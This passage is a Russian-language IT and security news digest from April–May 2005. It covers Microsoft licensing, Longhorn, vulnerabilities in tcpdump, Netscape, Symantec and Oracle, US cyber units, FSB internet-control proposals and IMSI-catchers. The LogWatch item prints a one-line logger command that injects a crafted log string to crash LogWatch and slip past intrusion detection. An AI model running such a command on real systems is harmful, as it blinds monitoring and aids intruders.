В рамках своей нарастающей антипиратской кампании Microsoft тестирует программу, по которой некоторым заказчикам, чьи копии Windows оказались фальшивыми, будет предложена бесплатная лицензионная версия Windows XP Professional. Это очередной этап в развитии программы Windows Genuine Advantage, которую Microsoft втихомолку запустила в сентябре прошлого года. Она заключается в том, что при помощи специального ПО производится проверка легитимности данной конкретной копии Windows. Эта программа ляжет в основу кампании Microsoft по увеличению числа платных заказчиков среди миллионов людей, использующих Windows. Windows Genuine начиналась как добровольная программа, но затем Microsoft стала требовать легализации от все новых и новых категорий заказчиков, желающих загружать ПО компании. Например, в марте Microsoft заявила, что те, кто желает загрузить пакет программ поддержки иностранных языков для Windows, должны доказать подлинность своей копии Windows. Начиная со среды, тем заказчикам в США, чьи копии Windows XP Professional не прошли проверку на подлинность, будет предоставляться возможность получить бесплатную лицензионную копию. Для этого они должны будут заполнить заявление о фальсификации и предоставить Microsoft имеющийся у них диск с Windows и квитанцию, подтверждающую его покупку. «Наша цель — гарантировать, что замена будет производиться тем людям, которые действительно не знали, что они становятся жертвами подделки», — пояснил директор программы Genuine Windows Дэвид Лазар. Те, у кого нет диска или квитанции, могут приобрести лицензионную копию в онлайне за $149. Это дешевле, чем покупать полную копию Windows XP Pro, но дороже той копии Windows, которую оплачивают покупатели нового ПК.
Подробности

5/05/2005 11:17 Microsoft продает ряд своих закрытых разработок
Компания Microsoft намерена открыть для платного лицензионного пользования некоторые технологические разработки своего исследовательского подраздаления Microsoft Research, сообщает Associated Press. Традиционно компания известна тем, что строго ограничивает доступ к своим изобретениям и использует их в основном в своих нуждах. Представители компании объявили о начале программы по выдаче лицензий на ряд патентованных разработок на конференции инвесторов в Нью-Йорке. В Microsoft заявляют, что таким образом хотят помочь развиваться молодым компаниям, которые смогут использовать разработки софтверного гиганта в целях совершенствования своего бизнеса. Среди раскрываемых технологий - системы идентификации людей, в том числе с компьютерным распознаванием лица, программы для организации сетевых конференций, обучающие системы, учитывающие индивидуальные особенности обучаемых. Как ранее сообщалось, в январе 500 своих патентованных разработок раскрыла компания IBM, однако она перевела эти разработки в статус бесплатно распространяемых.
Подробности

5/05/2005 10:13 Федеральный правовой портал
Автор проекта Cyber-crimes.ru, Егорышев Александр Сергеевич, сообщил об открытии Вэб-сайта с одноимённым названием. Как написано на самом сайте, цель проекта - накопление результатов научно-практических исследований в области уголовного права, процесса, криминалистики и криминологии, касающихся квалификации, расследования, предупреждения и профилактики преступлений в сфере компьютерной информации. Проект создан для оказания теоретической и практической помощи студентам (курсантам), аспирантам (адъюнктам), преподавателям юридических вузов и факультетов, работникам правоохранительных органов, владельцам, собственникам и пользователям компьютерной информации.
Федеральный правовой портал

3/05/2005 09:53 Hewlett-Packard открыла в России Центр высоких технологий
Американская корпорация Hewlett-Packard (HP) открыла в Москве свой первый Центр высоких технологий. Как сообщается в пресс-релизе компании, "основными задачами Центра станут разработка, тестирование и демонстрация решений, а также обмен опытом и экспертизой HP и ее партнеров в области интеграции ИТ и бизнеса". Компания сообщает, что в течение ближайших пяти лет намеревается инвестировать в новый Центр 12 миллионов долларов. Как ожидается, в Центре будут проводиться обучающие семинары и тренинги, он также "станет площадкой для аккумулирования мирового и российского опыта реализации ИТ-проектов в различных отраслях, а также первым в регионе EMEA центром экспертизы компании НР в нефтегазовой отрасли". В настоящее время по всему миру работает более 80 подобных центров, которые делятся на центры 1, 2 и 3 уровня - уровень центра зависит объема выполняемых функций. Новый российский центр относится к первому уровню; он стал шестым центром этого уровня в мире.
lenta.Ru

3/05/2005 09:19 Сайт "Кавказ-центра" снова хотят поместить на финский хостинг
Гражданин Финляндии Микаэл Стурше, который известен тем, что обеспечивает за рубежом техническую поддержку сайту чеченских сепаратистов "Кавказ-центр", заявил, что намеревается возобновить функционирование сайта на финском хостинге. Ранее сайт уже размещался в Финляндии на мощностях телекоммуникационного оператора TeliaSonera Finland, однако в октябре прошлого года он был закрыт после обращения к финским властям российского МИДа. Как сообщалось, этот сайт также размещался ранее в Литве на мощностях фирмы Elneta, был закрыт после обращения российского МИДа, однако впоследствии ему было снова разрешено функционировать. Еще раньше сайт работал в США, но его деятельность там также была пресечена. После проблем с финским хостингом сайт переехал в Швецию, где и базируется до сих пор - шведские власти отказались применять какие-либо санкции в отншении провайдера Port80, услугами которого пользуется "Кавказ-центр". Остается неясным, зачем при успешно работающем шведском хостинге владельцы сайта "взобновляют его работу" в Финляндии и Литве. Как передает РИА "Новости", Микаэл Стурше накануне заявил на пресс-конференции в Хельсинки, что поддержка сайта для него - "дело принципа, и он намеревается вновь открыть сайт в Финляндии в течение текущей недели".
РИА "Новости"

2/05/2005 13:03 Microsoft будет помогать разрабатывать UWB
Компания Microsoft объявила о своём присоединении к отраслевой группе WiMedia Alliance, продвигающей беспроводную технологию UWB, предназначающуюся для высокоскоростной передачи данных на короткие расстояния. Одной из технологий реализующих UWB является Wireless USB. Microsoft стала первой организацией, работающей с программным обеспечением, поддерживающей WiMedia Alliance, членами которой являются компании HP, Intel, Kodak, Nokia, Philips, Samsung Electronics, Sharp Laboratories, STMicroelectronics, Texas Instruments и Sony. В марте 2005 года WiMedia объединилась с отраслевой группой MultiBand OFDM Alliance Special Interest Group с целью ускорить внедрение UWB-технологии для беспроводных приложений. С присоединением Microsoft, разрабатываемые группой спецификации, достигнут уровня, который делает возможным разработку приложений. Присоединяясь к WiMedia компания Microsoft дала понять, что компания планирует поддержку таких приложений в следующих версиях Windows, а также будет оказывать помощь в разработке спецификации. WiMedia Alliance рассчитывает выпустить первую версию спецификации физического уровня к концу июня 2005 года, за которой последуют серия доработанных спецификаций и параметров приложений.
Mobile-Review

2/05/2005 12:49 Open Source Forum в Москву посетил создатель Perl
В четверг в Москве продолжался Open Source Forum, конференция, посвященная программному обеспечению с открытым исходным кодом. Второй день его работы был гораздо более насыщен событиями, нежели первый. С участниками конференции общались приглашенные гости: создатель языка программирования Perl Ларри Уолл, глава Linux International Йон "Мэддог" Холл, представители компаний IBM, HP, Novell и Mandriva (бывший Mandrakesoft). Во второй день Open Source Forum посетили около 2000 человек. Кроме представителей многочисленных российских компаний-разработчиков ПО, системных интеграторов, экспертов и консультантов, на конференцию пришли представители министерств и ведомств. Создатель Perl Ларри Уолл заметил, что компьютерные науки подобны рисованию: весь вопрос в том, кто держит кисточку. Как автора популярного языка программирования, его и самого, конечно, беспокоило, чему его детище может послужить. Когда к Уоллу выстроились желающие получить автографы, он подтвердил, что делать всё несколькими способами можно не только в Perl, но и в реальной жизни. Вместо ручки он вооружился набором печатей. Отпечатанный им девиз Perl "There's more than one way to do it" ("Есть не один способ сделать это") и верблюд теперь красуются на автографах, которые Уолл раздавал российским поклонникам.
"Компьюлента"

2/05/2005 12:14 Проект Sendmail X
На сайте популярного MTA Sendmail появился анонс о появлении альфа-версии нового продукта Sendmail X, предлагаемой для тестирования. Продукт не является развитием обычного Sendmail, на сайте его уже позиционируют не как MTA, а как MTS (крайняя "S" означает "SYSTEM"). Cостоит из следующих компонентов: Queue manager (QMGR), SMTP server (SMTPS), SMTP client (SMTPC), address resolver (SMAR), main control program (MCP). Для инсталляции системы требуется пакет Berkeley DB. Некоторые сравнивают Sendmail X с Postfix и находят между ними много общего (master - MCP, smtpd - SMTPS, local - LDA, smtp - SMTPC, trivial-rewrite - AR, qmgr - QMGR). Все заинтересованные приглашаются к тестированию.
Пресс-релиз

2/05/2005 11:49 Прошение OS2 World открыть исходный код OS/2
Известно, что OS/2 плохо поддерживается софтверными компаниями и индивидуальными разработчиками, и возможно, она вообще покинет рынок. Поэтому данное прошение к IBM направлено на то, чтобы горячо любимая OS/2 могла свободно распространяться и развиваться по всему миру, сообщает nixp.ru. Мы понимаем, что открытие исходных кодов OS/2 благотворно как для потребителей IBM, так и для самой корпорации, если трудности со сторонним кодом могут быть преодолены. И даже в этом случае мы готовы приложить свои усилия по решению проблемы. Открытие исходных кодов OS/2 принесет выгоду всем клиентам IBM, которые вложили средства в эту операционную систему. Пользователи, которые продолжают использовать OS/2, получат пользу от открытия этой ОС в постоянном развитии индивидуальными разработчиками и/или софтверными компаниями, их авторские отчисления уменьшатся, и в итоге мы получим повышенную безопасность ОС, которая будет актуальна вследствие не ограниченной по времени сущности разработок с открытым кодом (например, BSD и Linux). Также открытие исходных кодов OS/2 найдут полезным и пользователи, собирающиеся мигрировать на другие платформы, так как будет легче адаптировать свои программы или создавать интерпретаторы и эмуляторы OS/2. Мы знаем, что IBM сталкивается с проблемами открытия исходных кодов OS/2 в силу закрытых кодов сторонних компаний. Мы просим от IBM выложить столько исходных кодов, сколько возможно, и преречислить компоненты OS/2, которые необходимо заменить. С этим списком компании, интересующиеся OS/2, или индивидуальные разработчики смогут создать собственные открытые компоненты, которые и заполнят все «бреши». IBM, конечно, получит выгоду от открытия OS/2, т.к. сообщество OS/2 будет разрабатывать открытое ПО, как и в случае BSD и Linux. IBM может получить преимущество в этом, снижая издержки на сопровождение, вследствие содействия разработчиков по всему миру.
Петиция OS2 World

2/05/2005 10:45 США: для информационных войн в СЕТИ созданы кибервойска -JFCCNW
Вооруженными силами США в рамках сверхсекретной программы по обеспечению безопасности был создан самый крупный в мире отряд программистов-хакеров. Предназначение этого отряда — вести бескровную кибервойну с вражескими сообществами. Правительство Буша потратит миллионы долларов на то, чтобы превратить все существующие средства коммуникаций, включая электрические и телефонные сети, в поля сражений. О создании группы стало известно в ходе прошедших в марте заседаний Комиссии Сената США по делам вооружений. Представители американского военного Стратегического Командования (сокращенно Stratcom) обнародовали информацию о существовании этого отряда, получившего обозначение JFCCNW (Joint Functional Component Command for Network Warfare — Совместное функциональное командное подразделение для ведения сетевой войны). В соответствии с выполняемыми функциями, его неформально называют отрядом хакеров. JFCCNW уполномочено обеспечивать безопасность сетей Министерства обороны США. Подразделение также отвечает за проведение сетевых атак и взлом вражеских сетей в рамках программы CNA (Computer Network Attack). Это почти все, что известно о подразделении JFCCNW. Предполагается, что в его состав вошли представители ЦРУ, Агентства национальной безопасности, ФБР. Пентагон тратит на защиту своих сетей миллионы долларов, тем не менее, только за прошлый год было зафиксировано около 75 тысяч нападений злоумышленников на компьютерные сети Министерства обороны США. Дэн Вертон (Den Verton), бывший офицер американской морской разведки, автор книги «Черный лед», предполагает, что созданной команде удастся, разрушив компьютерные сети врагов, проникнуть в их компьютеры с целью захвата и управления стратегически важной информацией. Также группа сможет внедрить саморазмножающийся вирус, который будет способен вывести из строя даже системы ПВО противника. Поводом для создания подобного отряда послужила директива, подписанная президентом Бушем летом 2002 года. Согласно этой директиве, правительство США должно было разработать национальную политику по проведению войн в киберпространстве.
CNews

1/05/2005 12:56 Sun готовится превзойти Java
Некоторое время назад стало известно, что в компании Sun ведётся разработка нового языка программирования Fortress, который будет ориентирован прежде всего на вычислительные задачи, и должен будет составить прямую конкуренцию FORTRAN, сообщает linux.org.ru. Разработчики нового языка заявляют: "мы приняли колоссальный вызов -- создать язык лучше чем Java". 26 апреля была опубликована официальная спецификация, в которой обещаны: развитая компонентная архитектура; расширяемый синтаксис языка; выведение типов и параметрические типы; поддержка хвостовой рекурсии; замыкания; функции первого порядка; исключения и goto; параллельные циклы; встроенные типы для больших чисел и матриц.
Спецификация в PDF

1/05/2005 12:38 Уязвимости в tcpdump
Обнаружены уязвимости в популярном анализаторе пакетов (снифере) tcpdump, популярном в мире открытых систем, которые позволяют удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость в обработке GRE пакетов в функции isis_print позволяет удаленному пользователь может с помощью специально сформированного GRE пакета заставить приложение войти в бесконечный цикл. Уязвимость существует также при обработке BGP пакетов. Удаленный пользователь может создать специальным образом BGP пакет и заставить приложение войти в бесконечный цикл. Уязвимость при обработке LDP пакетов в функции ldp_print() позволяет удаленному пользователю создать специально сформированный LDP пакет и заставить приложение войти в бесконечный цикл. Уязвимость в функции rsvp_print() может быть эксплуатирована посредством специально сформированного RSVP пакета. Удаленный пользователь может вызвать отказ в обслуживании приложения. В репозитарии CVS доступна обновлённая версия tcpdump. Необходимо отметить, что выпущены эксплоиты уязвимостей, ссылки на которые приводятся ниже.
Эксплоит 1
Эксплоит 2
Эксплоит 3
Эксплоит 4

1/05/2005 11:47 В браузерах Netscape найдена серьезная уязвимость
Серьезная брешь системы безопасности обнаружена в двух версиях браузера Netscape: 7.2 и 6.2.3. Проблема связана с тем, как браузер обрабатывает графические файлы формата GIF, сообщает сайт vnunet.com. По данным датской компании Secunia, из-за сбоев в обработке изображений в браузере возникает переполнение буфера, которым могут воспользоваться хакеры. Единственный совет, который в настоящее время Secunia дает пользователям, — «пользоваться другим продуктом». Обнаруженная в браузерах Netscape брешь подобна той, что в предыдущие месяцы была зафиксирована в браузере Mozilla. Netscape получила информацию о бреши в своем браузере от стороннего эксперта. Заплатка для обнаруженной уязвимости пока не выпущена.
Подробности

1/05/2005 11:37 По "электронной готовности" Украина на 57 месте из 65
В новом мировом рейтинге стран по "электронной готовности", составленном английским журналом The Economist и корпорацией IBM, Украина заняла 57-е место из 65 возможных. ют "Новые ИзПо сравнению с прошлым годом она поднялась на три позиции. Сравнивая "электронную готовность" разных стран, составители рейтинга учитывают, какой процент населения пользуется Интернетом через кабельные и беспроводные сети, сколько граждан используют услуги электронного банкинга - управления банковскими счетами через Интернет. Принимается во внимание и то, насколько развита система осуществления налоговых платежей через глобальную сеть. В этом году количество полученных баллов (максимум 10) во многом зависело от наличия в стране законов и технологий, защищающих пользователей от возможного ущерба, наносимого вирусами и хакерами. Россия набрала 3,98 балла. У лидирующей уже второй год Дании - 8,74. Из стран СНГ Россию обогнали прибалтийские государства - Эстония (26-е место), Латвия (37-е) и Литва (40-е место). Отстают от РФ Украина (57-е), Казахстан (62-е) и Азербайджан. В первую десятку вошли в основном западноевропейские государства, США, Гонконг и Австралия. Во второй десятке главным образом европейцы. Любопытно, что Южная Корея оказалась только на 18-м месте, хотя там отмечен наибольший процент домохозяйств, подключенных к Интернету, - 75%. Корейцев подвело отсутствие механизмов защиты. Японцы же - на 21-м месте. Шестую десятку вместе с Украиной делят Россия, Египет, Китай, Эквадор и Филиппины.
Подробности

1/05/2005 10:17 Несостоявшийся дефейс сайта GrSecurity
Заметив довольно "необычную" картинку на Вэб-сайте проекта GrSecurity, Zone-H поспешила объявить о дефейсе сайта. Проект GrSecurity известен в кругу Linux-администраторов набором патчей для ядра, позволяющих ввести в ОС систему RBAC (Role-Based Acces Control - контроль доступа на основе ролей), а также защитить от атак типа "переполнение буфера" с помощью PaX, ввести случайные ID процессов, ввести механизм просмотра процессов, ввести защиту смены корневого каталога (change root hardening), ввести дополнительную защиту /tmp. Ведёт проект Brad Spengler. Так вот, 26 апреля на титульной странице Вэб-сайта вместо традиционной была замечена довольно знимательная фотография девушки с заячьими ушками (и отдыхающим на заднем плане на полу мужиком) и с надписью: ""fluffy sez... greeting earthling..don't just sit on your feet! Free [RaFa]! HAPPY BIRTHDAY BRADLEY!!!1" Было сделано предположение о дефейсе сайта некоей неизвестной группой "Fluffy Bunny". Кроме того, фраза Free [RaFa] якобы указывала на недавно арестованного в Венесуэле члена хакерской группы "WoH". Как указывала та же Zone-H раньше указания на группу "Fluffy Bunny" появлялись при дефейсах сайтов SANS Institute, SecurityFocus. Однако, как оказалось, всё было намного проще и далеко от дефейса. Как указал в письме Zone-H сам Брэд Спенглер, это была шутка его друзей на его день рождения. Ничего не было дефейснуто и затронуто, просто на сервере провайдера, на котором хостится сайт проекта GrSecurity, была изменена титульная страница проекта.
Зеркало "дефейса"

1/05/2005 10:14 Выход J2SE 5.0 Update 3
Как сообщает opennet.ru, вышло третье обновление J2SE 5.0, в котором исправлено 79 недоработок. Также объявлено об изменении стратегии нумерации версий, J2SE 5.1 не будет выпущена (5.0 Update 3 можно приравнять к 5.1), сразу появится Java 6, до это будет еще несколько "update" выпусков.
Подробности

30/04/2005 20:22 Хакер из США признан виновным во взломах компьютерных систем
Бывший компьютерщик Лос-Аламосской лаборатории признан виновным во взломах компьютерных систем как минимум двух крупных американских компаний, сообщает Associated Press. Двадцатипятилетний Джером Т. Хекенкемп был взят под стражу в январе 2001 года и обвинен в совершении хакерских атак на системы онлайнового аукциона eBay и компании Qualcomm. В ходе следствия было установлено, что, будучи студентом Висконсинского университета в Мэдисоне, Хекенкемп предпринимал неоднократные попытки взломать компьютерные системы не только вышеназванных компаний, но и таких фирм, как Exodus Communications, Juniper Тetworks, Lycos и Cygnus Solutions. Подсудимый был уличен в проникновении в компьютерную систему онлайнового аукциона eBay в феврале и марте 1999 года. В результате преступных действий им была испорчена веб-страница компании, и, кроме того, злоумышленник инсталлировал ряд программ-шпионов, которые собирали информацию об именах пользователей и их паролях. В результате, Хекенкемп получил доступ и ко многим другим компьютерам компании. Помимо этого, преступник признался и в том, что в конце 1999 года ему удалось проникнуть в базу компании Qualcomm и установить на сервере несколько троянских программ. За совершенные киберпреступления Хекенкемп мог поплатиться пятью годами лишения свободы, однако суд счел, что злоумышленник проведет за решеткой только восемь месяцев. После этого его посадят под домашний арест, где он будет находиться под строгим контролем властей. Кроме того, в течение последующих трех лет Хекенкемпу запрещается пользоваться персональными компьютерами с выходом в интернет. Но и это еще не все. Помимо всего прочего, преступник должен выплатить денежный штраф в размере 268291 доллара США.
Crime-Research

30/04/2005 14:15 Эпоха почтовых вирусов близится к закату
Их место займут трояны и другие шпионские программы. По словам директора компании Websense Security Labs Дэна Хаббарда (Dan Hubbard), количество вирусов, распространяющихся с помощью электронной почты, демонстрирует устойчивую тенденцию к сокращению и, по всей видимости, будет сокращаться еще довольно долго. Один из руководителей другой антивирусной компании – Trend Micro – Дэвид Перри (David Perry) объясняет этот процесс тем, что у каждого вида вредоносных программ есть свой цикл жизни, называемый "эпохой" и эпохе почтовых вирусов приходит конец, пишет Silicon.com. Это, впрочем, не означает, что теперь пользователи интернета смогут дышать свободно: в ближайшее время на смену вирусам придут шпионские программы, с помощью которых разнообразные мошенники попытаются заработать свой миллион. Пока не появится что-нибудь еще.
Internet.Ru

30/04/2005 14:05 Microsoft готовит защиту для новой версии Windows
Новая версия операционной системы Windows — Longhorn, будет снабжена специальными функциями для обеспечения безопасности. Эти функции позволят Microsoft извлечь пользу из разработок ведущих производителей компьютерной техники, отмечает Security Focus. Microsoft намеревается включить в свой новый продукт функции шифрования и проверки чистоты системы. Эти функции позволят пользователям компьютеров, не подключенных к сети, убедиться в том, что их машины не поражены вредоносными программами. Набор новых функций получил название Secure Startup и получился несколько ограниченным по сравнению с тем, который Microsoft намеревалась внедрить на начальном этапе создания Longhorn. «Мы по-прежнему целиком привержены идее создания новой технологии безопасности для платформы Windows, которая будет использовать уникальный дизайн аппаратного и программного обеспечения. Эта технология даст пользователям новый вид защиты. Изменения, которые мы делаем, можно охарактеризовать как эволюцию этой идеи», — заявила представитель Microsoft Селена Уилсон (Selena Wilson). Secure Startup будет представлять собой комбинацию шифрования, проверок чистоты операционной системы и аппаратный модуль Trusted Platform, который будет определять опасные изменения и защищать данные пользователя в случае, если компьютер будет украден.
VirusList

30/04/2005 13:13 Опасная дыра в антивирусах Symantec
В антивирусных программных продуктах Symantec обнаружена новая уязвимость, которая теоретически может использоваться злоумышленниками для внедрения в удаленную систему вредоносных модулей. Проблема связана с ошибкой, возникающей в одном из компонентов таких приложений, как Norton Internet Security 2005 или Mail Security for Exchange, при обработке сформированных особым образом сжатых файлов в формате RAR. При сканировании таких архивов происходит сбой, в результате чего уязвимые приложения пропускают RAR-файлы без их предварительной проверки. Впрочем, при последующей распаковке архива его содержимое все же будет проверено сканером, работающим в режиме реального времени. Датская компания Secunia охарактеризовала дыру умеренно критической, тогда как специалисты Symantec присвоили уязвимости рейтинг малоопасной. Брешь присутствует в корпоративных приложениях Symantec Web Security, Symantec AntiVirus Scan Engine, Symantec Mail Security for Exchange, Symantec SAV/Filter for Domino NT, а также программных продуктах для частных пользователей Symantec Norton AntiVirus 2005, Symantec Norton Internet Security 2005 и Symantec Norton System Works 2005 для операционных систем Microsoft Windows. Заплатки для дыры могут быть загружены либо через службу LiveUpdate (если данная возможность поддерживается конкретным приложением), либо непосредственно через веб-сайт технической поддержки Symantec. Дополнительная информация о проблеме доступна в этом бюллетене безопасности.
Подробности

30/04/2005 12:55 Symantec возьмется за шпионские программы
Компания Symantec выпустила бета-версию интегрированного решения для обеспечения безопасности работы в интернете, которое должно защитить домашних пользователей от программ-шпионов и рекламных программ. Новые функции защиты от шпионского софта будет будут добавлены в Norton Internet Security AntiSpyware Edition. Программа в реальном времени ищет и удаляет программы-шпионы с компьютеров пользователей. Кроме защиты от шпионских программ, разработчики обещают защиту от спама, вирусов, червей и хакерских атак. Продукт построен по принципу многоуровневого сканирования и пытается идентифицировать сомнительную программу уже "на входе" в систему, пока она не успела навредить. Все операции по лечению системы будут проводится на базе технологии Symantec Quarantine. Это даст пользователю возможность обратить все изменения, произведенные Norton Internet Security 2005 AntiSpyware Edition над системой. Примечательно то, что разработку антишпионского софта ведут многие компании. В частности, Microsoft уже выпустила бета-версию Microsoft Windows AntiSpyware, которая стала их первым оружием в борьбе со шпионскими программами.
"Компьюлента"

30/04/2005 11:53 Longhorn будет работать и на некоторых старых ПК
Несмотря на то, что для Longhorn, новой версии Windows, Microsoft рекомендует достаточно современные компьютеры, есть вероятность, что эта ОС будет работать и на многих более старых машинах. Это хорошая новость. Плохая же заключается в том, что на этих старых системах Longhorn будет выглядеть и работать совсем иначе. Например, компьютеры с процессором 3 ГГц и 512 Мбайт памяти смогут реализовать все красоты, включая высококачественную графику и возможность управлять сразу несколькими видеопотоками. Первые испытания показывают, что старые ПК, возможно даже со 128 Мбайт памяти, смогут работать с Longhorn, но при этом ОС на них может выглядеть иначе, чем на более современных машинах. Многие из таких старых машин будут работать под Longhorn «совсем как ХР», сказал представитель Microsoft Ричард Расселл. В новой Windows будет по крайней мере четыре разных уровня графики. Два из них — Aero и Aero Glass — реализуют новую композиционную графику с мощной оболочкой Glass, которая добавляет новые трехмерные эффекты и переходы. Другое представление, называемое To Go, предназначено для лаптопов и других потребительских машин и заимствует из Aero многие цветовые схемы, но без особых красивостей. Наконец, классический режим будет близко напоминать ХР и даже Windows 2000. Но будут различия и в производительности: у более мощных систем с новой ОС будет больше возможностей. Это означает серьезный сдвиг в философии Microsoft. В прошлых версиях Windows, включая Windows ХР, операционная система обычно либо работала на машине в полную силу, либо не работала вообще. «ХР — это всегда ХР, — сказал Расселл. — В Longhorn все по-другому. Эта операционная система по-настоящему масштабируема».
Более подробно

30/04/2005 10:51 Вышла новая версия операционной системы Mac OS для платформы Apple
В пятницу 29 апреля в свободную продажу поступает новая модификация операционной системы Mac OS для платформы Apple Macintosh - Mac OS X 10.4, также известная под именем Tiger. Одним из основных преимуществ новой системы объявлена технология Spotlight, которая позволяет пользователям динамично структурировать информацию на своем жестком диске и производить текстовый поиск по его содержимому. В последнее время подобная функциональность становится все более актуальной, так как в целом изменился подход к хранению информации - современные жесткие диски имеют большую емкость, на них в большом количестве скапливаются разнообразные данные, плохо поддающиеся сортировке вручную. В связи с этим, в частности, минувшей осенью для платформы Windows разные производители начали выпускать программы для локального поиска, индексирующие содержимое жестких дисков. Apple также представляет ряд других новых и улучшенных старых функций, отвечающих современным требованиям к работе с компьютером. В частности, систему автоматизации регулярных задач Automator, модернизированную систему управления приложениями Dashboard, новую версию интернет-браузера Safari с расширенной поддержкой функций экспорта информационных RSS-потоков с различных сайтов, и другие нововведения. Заявленная Apple стоимость новой системы - 129 долларов, при этом существует возможность приобретения "семейной версии" за 199 долларов, которая включает в себя пять лицензий на установку.
Lenta.Ru

29/04/2005 21:09 ФСБ хочет больше полномочий по контролю за Интернетом
Представитель Центра информационной безопасности ФСБ РФ Дмитрий Фролов в четверг заявил, что российским спецслужбам необходимо расширение полномочий по контролю за коммуникационными сетями. "Необходимо значительно расширить полномочия российских спецслужб по контролю за коммуникационными системами и трафиком сети Интернет", - заявил он, выступая в четверг в Совете Федерации на заседании "круглого стола", посвященного вопросам законодательного обеспечения деятельности в области телекоммуникаций и интернет-технологий, сообщает РИА "Новости". В частности, по словам Фролова, ФСБ предлагает выработать новые требования к компаниям-провайдерам, "чтобы предотвратить распространение в Интернете экстремистских идей, вести учет нелегальной сетевой активности, а также иметь возможность получать базы данных и регистрации телефонных абонентов с указанием их интернет-адресов - как статических, так и динамических". "Необходимо также ввести обязательную регистрацию абонентов операторов мобильной связи, учитывая их возможности выхода в Интернет", - сказал Фролов. Он отметил, что в Интернете существует "масса сайтов", на которых описывается процедура изготовления взрывчатки и ее использования. "Что касается воздействия на электорат, то по своим масштабам Интернет в этом еще уступает традиционным СМИ, однако он уже представляет собой серьезный инструментарий для формирования общественного мнения", - подчеркнул представитель ФСБ. По его словам, в настоящее время группировки различных политических ориентаций могут использовать Интернет для "мобилизации политических сил против властей своего государства". "Примером тому могут служить недавние события в Югославии, Грузии и Украине", - сказал Фролов. "Неурегулированность правовых отношений в Интернете влечет за собой угрозу распространения недостоверной и тенденциозной информации, разглашение тайн, незаконное копирование конфиденциальной информации, а также нарушение авторских прав", - заявил представитель ФСБ. Он также заявил, что существует "реальная возможность использования Интернета для инициирования сбоев сетей военных и гражданских объектов, а также для хищения крупных сумм". "Однако отечественное право пока не готово к регулированию деятельности в сфере Интернета", - приводит слова Фролова РИА "Новости".
РИА "Новости"

29/04/2005 20:47 Новый персональный компьютер работает от Интернета
Британская фирма DSP Design создала мини-компьютер, который питается не от электрической розетки, а через кабель передачи данных, сообщает BBC News. До сих пор подобным образом работали только некоторые камеры наблюдения и телефонные аппараты. В DSP уверены, что их решение придется по вкусу пользователям в тех случаях, когда сложно протянуть к компьютеру больше одного провода. Экспериментальный компьютер был создан в рамках масштабного проекта по разработке оборудования, которое сможет питаться от ethernet-кабеля в локальных сетях. Сейчас мощность этих сетей ограничена 15,4 ваттами. Этого может хватить для того, чтобы питать трубки для IP-телефонии, сетевые хабы и веб-камеры, однако недостаточно для персональных компьютеров. Созданная DSP Design машина Poet 6000 способна работать при 12 ваттах. Добиться рекордно низких значений удалось благодаря использованию жидкокристалического экрана и энергосберегающих компонентов. Эксперты ожидают, что Poet 6000 будет использоваться в информационных киосках, которые обычно устанавливают в торговых центрах, библиотеках, на вокзалах. В некоторых случаях тянуть два кабеля к таким устройствам оказывается дорого и неудобно. Специалисты также считают, что Poet 6000 заинтересует пользователей ноутбуков.
Подробности

29/04/2005 19:45 МИД России не понял необходимости усиления защиты авторских прав
МИД России выразил недоумение по поводу "жесткой постановки вопроса о необходимости добиваться от России усиления защиты интеллектуальной собственности". Таким образом министерство отреагировало на резолюцию Сената США, в которой выражается крайняя озабоченность по поводу нарушения авторских прав в России, и на решение американской администрации включить Россию в список самых "пиратских" стран. Как говорится в официальном заявлении МИДа, российское законодательство в сфере интеллектуальной собственности обеспечивает вполне адекватную и эффективную охрану соответствующих прав. МИД отмечает, что Россия подписала и добросовестно выполняет многие международные соглашения в этой области. По мнению МИДа, российские власти принимают достаточно эффективные меры по борьбе с пиратами. В заявлении говорится, что для координации деятельности российских ведомств создана правительственная комиссия по противодействию нарушениям прав интеллектуальной собственности. МИД признал, что проблема нарушения авторских прав в России существует. Вместе с тем министерство назвало эту проблему международной по своей природе. "Предъявляемые к российской стороне претензии носят не всегда обоснованный характер", - считает МИД. Резолюция Сената США посвящена ситуации с защитой прав интеллектуальной собственности в России и Китае. Авторы резолюции считают, что пиратство в этих странах достигло огромных масштабов и наносит американской экономике убытки на сумму в четыре миллиарда долларов ежегодно. Сенаторы угрожают лишить Россию некоторых торговых преференций, а в отношении Китая принять меры в рамках ВТО.
Официальное заявление МИД

29/04/2005 13:37 Перехват разговоров по мобильной связи - устройство IMSI-catcher
Специальное устройство, называющееся IMSI-catcher (то есть ловец IMSI, уникального идентификатора International Mobile Subscriber Identity, прописанного в SIM-карте), притворяется для находящихся поблизости мобильников настоящей базовой станцией сотовой телефонной сети. Такого рода трюк возможен по той причине, что мобильный телефон обязан аутентифицировать себя по запросу сети, а вот сама сеть (базовая станция) свою аутентичность подтверждать телефону не должна (Пионером в производстве таких устройств стала, судя по всему, немецкая компания Rohde & Schwarz, но сегодня подобные «перехватчики» предлагают и другие фирмы (правда, термин IMSI-Catcher используется далеко не всегда). Надо сказать, что описанный Киви способ перехвата разговоров очень дорог и представить, что его использует негосударственная служба, умеющая считать деньги, сложно. А у государственных служб — по крайней мере, в России — есть и другие методы получения информации. Эта вопиющая дыра в безопасности GSM была внесена в архитектуру системы совершенно умышленно по настоянию спецслужб — для организации перехвата и мониторинга без ведома компаний-операторов мобильной связи. Поэтому, как только мобильный телефон принимает IMSI-catcher в качестве своей базовой станции, этот аппарат-ретранслятор может деактивировать включенную абонентом функцию шифрования и работать с обычным открытым сигналом, передавая его дальше настоящей базовой станции. Как свидетельствуют знающие люди, в настоящее время на рынке нет ни одного GSM-телефона, который бы активно предупреждал владельца о принудительно отключенной функции шифрования. Зато в продаже хватает ныне аппаратов, у которых функция шифрования в явном виде вообще не реализована.
Подробнее: computerra.ru

23/04/2005 11:22 Эксплоит уязвимости Oracle
Esteban Martinez Fayo опубликовал эксплоит уязвимости в СУБД Oracle, позволяющий путём внедрение (SQL Injection) SQL-запроса выполнить произвольную команду ОС, на которой работает Oracle.
Эксплоит

23/04/2005 11:18 Уязвимость в LogWatch
В LogWatch 2.6 и более ранних версиях обнаружена уязвимость. Злоумышленник может вывести из строя LogWatch, и таким образом обойти механизм обнаружения злонамеренной активности. Для этого он должен внедрить произвольную строку в '/var/log/secure/’ файл (например посредством другого приложения) и с помощью ошибки при обработке регулярных выражений в 'scripts/services/secure' вызвать отказ в обслуживании сценария. Пример эксплоита: logger -p authpriv.notice '+++ connection closed by localhost +++'. Выпущена версия 2.7.
Cайт производителя

23/04/2005 11:06 Хакер признался во взломе сети Пентагона
